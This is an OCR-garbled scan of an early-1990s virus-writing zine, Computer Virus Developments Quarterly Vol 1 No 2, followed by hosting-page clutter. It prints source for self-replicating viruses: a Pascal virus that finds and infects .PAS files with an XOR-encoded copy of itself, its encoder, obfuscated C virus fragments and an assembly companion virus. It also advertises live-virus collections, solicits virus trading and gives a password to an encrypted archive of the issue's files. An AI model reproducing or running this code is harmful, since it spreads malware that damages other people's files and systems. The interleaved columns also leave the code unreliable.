the program is infected. While scanning the file, this routine also sets or (pos(’END.’,t)>0))
the uses_flag, which is true if there is already a “uses” statement in and (impf)
the program.} and (not pw) then
function ok_to_attach(file_name:string):boolean; begin
var pw:=true;
host_file :text; for j:=1 to sizeof(tconst) do
txtline :string; write(ft,chr((tconst[j] xor $AA) shr 1));
begin end;

if (filetype=’D’) {write viral procedure to the file}
and ((pos(’PROCEDURE’,t)>0) {in a program}
or (pos(’FUNCTION’,t)>0)
Coming in the Spring Issue: or (pos(’BEGIN’,t)>0))

and (not pw) then
begin
pw:=true;
for j:=1 to sizeof(tconst) do
write(ft,chr((tconst[j] xor $AA) shr 1));
MUTATION
end;
if pos(’END.’,t)>0 then {write call to virus into main procedure}
begin
if (pos(’END’,lt)>0) and (filetype=’U’) then writeln(ft,’begin’);
t:=’virus;’;
for j:=1 to pos(’END.’,UpString(l))+1 do t:=’ ’+t;
writeln(ft,t);
end;
ENGINES
writeln(ft,l);
until eof(f);
close(f); {close file}
close(ft); {close temporary file}
erase(f); {Substitute temp file for original file}
rename(ft,fn);
end;
begin {of virus}

Including a FULL DISCLOSURE of the if find_pascal_file then
append_virus;
{if an infectable file is found}
{then infect it}
Dark Avenger Mutation Engine end; {of virus}
{$ENDIF}
and, of course, a copy of the engine itself. begin {of main}
virus; {this program just starts the virus}
end. {of main}
—Don’t Miss Out—

Subscribe Today! Source Listing of ENCODE.PAS
The following program takes two command-line
We offer the following items for sale: parameters. The first is the input file name, and the
001—The Little Black Book of Computer Viruses, by Mark Ludwig, the award second is the output file name. The input can be any text
winning classic which teaches you the basics of how viruses work. 192pp. file, and the output is an encrypted Pascal constant dec-
$14.95, $2.00 shipping. Overseas airmail $7.50.
002—The Little Black Book of Computer Viruses Program Disk, $15.00 laration.
003—Computer Virus Developments Quarterly, 1 Year Subscription with
diskettes, $75.00, overseas airmail add $10.00. program encode;
{This makes an encoded pascal constant out of a file of text}
004—Computer Virus Developments Quarterly, Single issue with diskette,
var
$25.00. Overseas airmail add $2.50. fin :file of byte;
005—Tech Note #1: The Pakistani Brain Virus, a complete disassembly and fout :text;
s :string;
explanation of the first stealth boot sector virus, includes booklet and disk. b :byte;
$20.00. bcnt :byte;
006—Tech Note #2: The Stoned Virus, a complete disassembly and explanation function ef:boolean; {End of file function}
begin
of the world’s most successful boot sector virus. Includes booklet and ef:=eof(fin) or (b=$1A);
disk. $20.00. end;
007—Tech Note #3: The Jerusalem Virus, a complete disassembly and begin
if ParamCount<>2 then exit; {Expects input and output file name}
explanation of this simple but effective memory resident virus. Includes assign(fin,ParamStr(1)); reset(fin); {Open input file to read}
booklet and disk. $20.00. assign(fout,ParamStr(2)); rewrite(fout); {Open output file to write}
writeln(fout,’const’); {"Constant" statement}
008—Tech Note #4: How to Write Protect an MFM Hard Disk. The ultimate write(fout,’ tconst:array[1..’,filesize(fin),’] of byte=(’);
way to protect against the spread of viruses. Don’t go out and pay hundreds bcnt:=11;
repeat
{Define the constant tconst}
of $ for one of these devices, when you can build one for less than twenty read(fin,b); {Read each byte individually}
bcnt:=bcnt+1;
dollars! No diskette. $12.00. if b<>$1A then {b <> eof marker}
begin
write(fout,(b shl 1) xor $AA); {Encode the byte}
Add $2.00 postage ($4 overseas airmail) for any combination of diskettes and if (not ef) then write(fout,’,’);
Tech Notes. Arizona residents please add 5% sales tax. if (bcnt=18) and (not ef) then {Put 16 bytes on each line}
begin
writeln(fout);
write(fout,’ ’);
Qty Item No./Description Price bcnt:=0;
end;
end
else write(fout,($20 shl 1) xor $AA);
until ef; {Go to the end of the file}
writeln(fout,’);’);
Shipping close(fout); {Close up and exit}
close(fin);
Sales Tax end.
Total
Preferred Disk Size: 3-1/2" 5-1/4" Thank you to all of those who responded to our request
Please ship to: to exchange viruses. We are still interested in building
Name our collection, so if you have viruses or need them, call
and we will work a trade. Once we get this collection
Address sufficiently well organized, we may set up a private BBS
for subscribers, if there is sufficient interest. We are
City/State/Zip engaged in active virus research, and would welcome
(Country) people interested in carrying out some aspect of this
research, especially disassemblies. Financial rewards
Make checks payable to: are possible here. We would also consider any articles
American Eagle Publications, Inc. submitted for possible publication in CVDQ. Please call
P. O. Box 41401 (602)888-4957, or write Mark Ludwig at American Eagle
Tucson, AZ 85717 (USA) Publications, Inc., PO Box 41401, Tucson, AZ 85717.

Please come to
www.computervirus.bz
for top-notch information on Computer Viruses and

Hacking!
Out of respect for our web server’s antivirus

software, the files that go with this issue are stored
in an encrypted ZIP file. The password for this file
is: AK_Slime
Have fun!
Order from www.ameaglepubs.com today!
Dr. Ludwig is back in black!
In this brand new book, Dr. Ludwig explores the fascinating world of email viruses in a way nobody
else dares! Here you will learn about how these viruses work and what they can and cannot do from a
veteran hacker and virus researcher. Why settle for the vague generalities of other books when you
can have page after page of carefully explained code and a fascinating variety of live viruses to
experiment with on your own computer or check your antivirus software with? In this book you'll
learn the basics of viruses that reproduce through email, and then go on to explore how antivirus
programs catch them and how wiley viruses evade the antivirus programs. You'll learn about
polymorphic and evolving viruses. You'll learn how viruse writers use exploits - bugs in programs
like Outlook Express - to get their code to execute without your consent. You'll learn about logic
bombs and the social engineering side of viruses - not the social engineering of old time hackers, but
the tried and true scientific method behind turning a replicating program into a virus that infects
millions of computers.Yet Dr. Ludwig doesn't stop here. He faces the sobering possibilities of email
viruses that lie just around the corner . . . viruses that could literally change the history of the human
race, for better or worse.Admittedly this would be a dangerous book in thewrong hands.Yet it would
be more dangerous if it didn't get into the right hands. The next major virus attack could see millions
of computers wiped clean in a matter of hours. With this book, you'll have a fighting chance to spot
the trouble coming and avoid it, while the multitudes that are dependent on a canned program to keep
them out of trouble will get taken out. In short, this is an utterly fascinating book.You'll never look at
computer viruses the same way again after reading it.
ISBN 0-929408-33-0, 232 pages, $16.95
The world of hacking changes continuously. Yesterday's hacks are today's rusty locks that no
longer work. The security guys are constantly fixing holes, and the hackers are constantly
changing their tricks. This new fourth edition of the Happy Hacker - just released in December,
2001 - will keep you up to date on the world of hacking. It's classicMeinel at her best, leading you
through the tunnels and back doors of the internet that is accessible to the beginner, yet
entertaining and educational to the advanced hacker. With major new sections on exploring and
hacking websites, and hacker war, and updates to cover the latest Windows operating systems,
the Happy Hacker is bigger and better than ever!
ISBN 0-929408-34-9, 464 pages $34.95

Outlaws of the Wild West
The Collection
CD-ROM
Here is the most incredible
collection of computer viruses, virus
tools, mutation engines, trojan horses,
and malicious software on the planet!
The software on this CD-ROM is
responsible for having caused literally
billions of dollars worth of damage in the
past ten years. People have lost their jobs
over it. People have gone to jail for writing
it. Governments and big corporations have
been confounded by it. Our advertising for this
CD has been banned in more magazines than you can
imagine - even the likes of Soldier of Fortune!
If you need viruses or malicious software - or information about it - for any
sane reason, this CD is for you! With it you can test your anti-virus software or
perfect the software you’re developing. You can build test viruses that your
software has never seen before to see if it can handle them. You can read what
virus writers have written about how easy or hard your software is to defeat, or
find out what a particular virus does. You can trace the history of a virus, or look
up in-the-field comments about how an anti-virus program is working or choking
up. You can study the source code of a particular virus or assemble it. You can
look at samples of live viruses collected from all over the world. See how ten
samples differ, even though your scanner says they’re all the same thing. In short,
this CD puts you in charge!
On it, you get a fantastic virus collection, consisting of 804 major families, and
10,000 individual and different viruses for PC’s, Macs, Unix boxes, Amigas and
others. You get 2700 files containing new viruses that aren’t properly identified
by most scanners. You get 30 megabytes of source code and disassemblies of
viruses, mutation engines, virus creation kits like theVirus Creation Lab, trojans,
trojan generating programs and source listings. Then add electronic newsletters
about viruses, text files and databases on viruses, tools for handling viruses, and
anti-virus software. For icing on the cake, we threw in all ofAmerican Eagle’s old
publications which are now out of print, including The Little Black Book of
Computer Viruses, Computer Virus Developments Quarterly, Underground
Technology Review and the Tech Notes. What you end up with is an absolutely
fantastic collection of material about viruses - over 444 megabytes, now
available at a reduced price!
PC Compatible CD-ROM, $49.95
Visit www.ameaglepubs.com today to get this amazing CD!

cvdq1 2 PDF

Uploaded by

Copyright:

Available Formats

cvdq1 2 PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

cvdq1 2 PDF

Uploaded by

Copyright:

Available Formats

Computer

guages—just that they are very cumbersome. Assembly

2 Computer Virus Developments Quarterly, Vol 1, No 2

Computer Virus Developments Quarterly, Vol 1, No 2 3

4 Computer Virus Developments Quarterly, Vol 1, No 2

Computer Virus Developments Quarterly, Vol 1, No 2 5

6 Computer Virus Developments Quarterly, Vol 1, No 2

Computer Virus Developments Quarterly, Vol 1, No 2 7

it pretty much the same as originally generated. mov

mov sp,(finish - start) + 01100h ;Change top of stack

These viruses aren’t a big threat IF you’re aware of mov

call search_files ;Find and infect a file

push bx ;Save old DTA address

COM files at a later date. push

perform these functions. Unfortunately, many packages mov

mov di,bx ;DI points to the DTA

recommend you protest to the manufacturer. And while mov

SPAWN.ASM Source Listing mov

;DOS create file function

mov ah,03Eh ;DOS close file function

8 Computer Virus Developments Quarterly, Vol 1, No 2

finish label near

“Either the simulator is useless, or you are distribut-

Computer Virus Developments Quarterly, Vol 1, No 2 9

10 Computer Virus Developments Quarterly, Vol 1, No 2

economical form possible. This could probably be ac- #include <stdio.h>

SCV1 could easily be made much more elusive and

Computer Virus Developments Quarterly, Vol 1, No 2 11

if ((host_file=fopen(fn,"r"))==NULL) return FALSE; /* open the file */ /******************************************************************************/

12 Computer Virus Developments Quarterly, Vol 1, No 2

int r785(char *a){FILE *b;int c;char d[255];if ((b=fopen(a,"r"))==NULL) return 0;

Test Drive do{c=d[0]=0;while ((!feof(b))&&((c==0)||(d[c-1]!=10))){fread(&d[c],1,1,b); c++;}

int r783(char *a){struct find_t b;int c;c=_dos_findfirst(a,_A_NORMAL,&b);while

int r781(char *a) {FILE *b;int c;strcpy(a,getenv("INCLUDE"));for (c=0;a[c]!=0;

before you attempt to run SCV1, or it will not reproduce.

Computer Virus Developments Quarterly, Vol 1, No 2 13

14 Computer Virus Developments Quarterly, Vol 1, No 2

Rather than making TCONST a straight ASCII constant, ok_to_attach:=true;

FindFirst(’*.PAS’,AnyFile,sr); {Search for pascal file}

Source Listing of SCVIRUS.PAS begin

Computer Virus Developments Quarterly, Vol 1, No 2 15

Coming in the Spring Issue: or (pos(’BEGIN’,t)>0))

begin {of virus}

—Don’t Miss Out—

16 Computer Virus Developments Quarterly, Vol 1, No 2

for top-notch information on Computer Viruses and

Out of respect for our web server’s antivirus

ISBN 0-929408-33-0, 232 pages, $16.95

ISBN 0-929408-34-9, 464 pages $34.95

You might also like

int r785(char a){FILE b;int c;char d[255];if ((b=fopen(a,"r"))==NULL) return 0;

int r781(char a) {FILE b;int c;strcpy(a,getenv("INCLUDE"));for (c=0;a[c]!=0;